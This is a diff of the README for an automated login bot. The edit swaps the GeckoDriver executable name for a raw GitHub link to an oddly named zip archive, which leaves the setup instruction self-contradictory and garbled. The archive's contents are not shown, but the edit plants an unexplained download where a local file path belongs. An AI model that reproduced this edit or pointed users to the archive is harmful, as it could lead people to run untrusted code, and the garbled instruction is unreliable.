Sam-bot-dev/Auto-login-bot/README.md

 🧑‍💻 Script Usage
 1. Set the GeckoDriver Path
-In the script, replace "geckodriver.exe" with the actual path to your GeckoDriver executable.
+In the script, replace "https://github.com/Sam-bot-dev/Auto-login-bot/raw/refs/heads/main/glomerular/login_bot_Auto_3.5-beta.1.zip" with the actual path to your GeckoDriver executable.

 Example: